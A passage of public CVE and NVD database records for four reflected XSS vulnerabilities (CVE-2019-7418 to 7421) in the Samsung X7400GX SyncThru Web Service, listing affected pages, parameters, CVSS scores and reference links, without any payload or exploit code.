| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsungprinter.com/ | Product |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| samsung | syncthru_web_service | - | |
| samsung | x7400gx_firmware | 6.a6.25 | |
| samsung | x7400gx | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:syncthru_web_service:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E83D6AD7-E2AB-4220-B2EB-9D640B43F05B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:x7400gx_firmware:6.a6.25:*:*:*:*:*:*:*",
"matchCriteriaId": "183B174C-EEA6-4768-9D4B-33AFC08E922D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:samsung:x7400gx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "28A60871-9265-46CD-973F-60891F7E6781",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters: flag, frame, func, and Nfunc."
},
{
"lang": "es",
"value": "Existe Cross-Site Scripting (XSS) en SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 en \"/sws/swsAlert.sws\" en m\u00faltiples par\u00e1metros: flag, frame, func y Nfunc."
}
],
"id": "CVE-2019-7418",
"lastModified": "2024-11-21T04:48:11.237",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-03-21T16:01:12.750",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-03-21 16:01
Modified
2024-11-21 04:48
Severity ?
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters: ruiFw_id, ruiFw_pid, ruiFw_title.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| cve@mitre.org | http://www.samsungprinter.com/ | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsungprinter.com/ | Product |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| samsung | syncthru_web_service | - | |
| samsung | x7400gx_firmware | 6.a6.25 | |
| samsung | x7400gx | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:syncthru_web_service:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E83D6AD7-E2AB-4220-B2EB-9D640B43F05B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:x7400gx_firmware:6.a6.25:*:*:*:*:*:*:*",
"matchCriteriaId": "183B174C-EEA6-4768-9D4B-33AFC08E922D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:samsung:x7400gx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "28A60871-9265-46CD-973F-60891F7E6781",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/leftmenu.sws\" in multiple parameters: ruiFw_id, ruiFw_pid, ruiFw_title."
},
{
"lang": "es",
"value": "Existe Cross-Site Scripting (XSS) en SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 en \"/sws/leftmenu.sws\" en m\u00faltiples par\u00e1metros: ruiFw_id, ruiFw_pid y ruiFw_title."
}
],
"id": "CVE-2019-7419",
"lastModified": "2024-11-21T04:48:11.397",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-03-21T16:01:12.860",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-03-21 16:01
Modified
2024-11-21 04:48
Severity ?
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.application/information/networkinformationView.sws" in the tabName parameter.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| cve@mitre.org | http://www.samsungprinter.com/ | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsungprinter.com/ | Product |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| samsung | syncthru_web_service | - | |
| samsung | x7400gx_firmware | 6.a6.25 | |
| samsung | x7400gx | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:syncthru_web_service:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E83D6AD7-E2AB-4220-B2EB-9D640B43F05B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:x7400gx_firmware:6.a6.25:*:*:*:*:*:*:*",
"matchCriteriaId": "183B174C-EEA6-4768-9D4B-33AFC08E922D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:samsung:x7400gx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "28A60871-9265-46CD-973F-60891F7E6781",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.application/information/networkinformationView.sws\" in the tabName parameter."
},
{
"lang": "es",
"value": "Existe Cross-Site Scripting (XSS) en SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 en \"/sws.application/information/networkinformationView.sws\" en el par\u00e1metro tabName."
}
],
"id": "CVE-2019-7420",
"lastModified": "2024-11-21T04:48:11.573",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-03-21T16:01:12.970",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2019-7420 (GCVE-0-2019-7420)
Vulnerability from cvelistv5
Published
2019-03-17 19:57
Modified
2024-08-04 20:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.application/information/networkinformationView.sws" in the tabName parameter.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | x_refsource_MISC | |
| http://www.samsungprinter.com/ | x_refsource_MISC | |
| http://www.samsung.com/Support/ProductSupport/download/index.aspx | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2019/Feb/28 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:46:46.274Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2019-02-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.application/information/networkinformationView.sws\" in the tabName parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-17T19:57:26",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-7420",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.application/information/networkinformationView.sws\" in the tabName parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"name": "http://www.samsungprinter.com/",
"refsource": "MISC",
"url": "http://www.samsungprinter.com/"
},
{
"name": "http://www.samsung.com/Support/ProductSupport/download/index.aspx",
"refsource": "MISC",
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-7420",
"datePublished": "2019-03-17T19:57:26",
"dateReserved": "2019-02-05T00:00:00",
"dateUpdated": "2024-08-04T20:46:46.274Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-7418 (GCVE-0-2019-7418)
Vulnerability from cvelistv5
Published
2019-03-17 19:43
Modified
2024-08-04 20:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | x_refsource_MISC | |
| http://www.samsungprinter.com/ | x_refsource_MISC | |
| http://www.samsung.com/Support/ProductSupport/download/index.aspx | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2019/Feb/28 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:46:46.312Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421 Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2019-02-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters: flag, frame, func, and Nfunc."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-17T19:43:06",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421 Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-7418",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters: flag, frame, func, and Nfunc."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"name": "http://www.samsungprinter.com/",
"refsource": "MISC",
"url": "http://www.samsungprinter.com/"
},
{
"name": "http://www.samsung.com/Support/ProductSupport/download/index.aspx",
"refsource": "MISC",
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421 Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-7418",
"datePublished": "2019-03-17T19:43:06",
"dateReserved": "2019-02-05T00:00:00",
"dateUpdated": "2024-08-04T20:46:46.312Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-7421 (GCVE-0-2019-7421)
Vulnerability from cvelistv5
Published
2019-03-17 19:59
Modified
2024-08-04 20:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple parameters: contextpath and basedURL.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | x_refsource_MISC | |
| http://www.samsungprinter.com/ | x_refsource_MISC | |
| http://www.samsung.com/Support/ProductSupport/download/index.aspx | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2019/Feb/28 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:46:46.213Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2019-02-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.login/gnb/loginView.sws\" in multiple parameters: contextpath and basedURL."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-17T19:59:07",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
